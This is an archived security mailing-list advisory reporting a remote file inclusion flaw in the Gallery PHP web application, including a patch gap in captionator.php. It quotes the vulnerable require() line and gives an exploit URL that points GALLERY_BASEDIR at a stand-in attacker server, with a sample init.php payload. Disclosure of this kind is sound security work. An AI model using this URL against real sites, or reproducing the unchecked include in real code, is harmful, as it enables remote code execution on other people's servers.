lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <5259.1028202010@www22.gmx.net> From: avart at gmx.de (avart@....de) Subject: Additional bugs in gallery Hi! Code injection in gallery ------------------------------------- # What is gallery The Gallery is actually the best web gallery application around in the world. I'm using it too ;-). Go to <http://gallery.sf.net/> to get further information. #### remote include problems #### # Problem description There are several include statements that includes a variable without checking it. A administrator of PowerTech (an ISP in Norway) discovered this problems. You're able to inject foreign code into the application (if allow_url_fopen is turned on). Example code: errors/configmode.php [...] <? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?> [...] # How can I exploit the code? Use this line: http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/ On http://your.evil.server.tdl/ you place a file called init.php that puts out nasty php-code. The file could look like this: init.php: <?php echo "<?php phpinfo(); ?>"; ?> # And the solution? Go to <http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=50&mode=thread&order=0& thold=0> to see how to solve the problem # Why do you post this problem again? Because the author of the announcement on the gallery website said: An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relativ ely easy to do. All you need to do is edit these files: errors/configmode.php errors/needinit.php errors/reconfigure.php errors/unconfigured.php That's not absolutely right...you have to patch the file: captionator.php too! Hope it's fixed in new releases :). ##### Credits ##### For the german-speaking folk: <http://bluephod.net/> Noncredit: florg, thank you for turning off the whole website! :/ -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net
Powered by blists - more mailing lists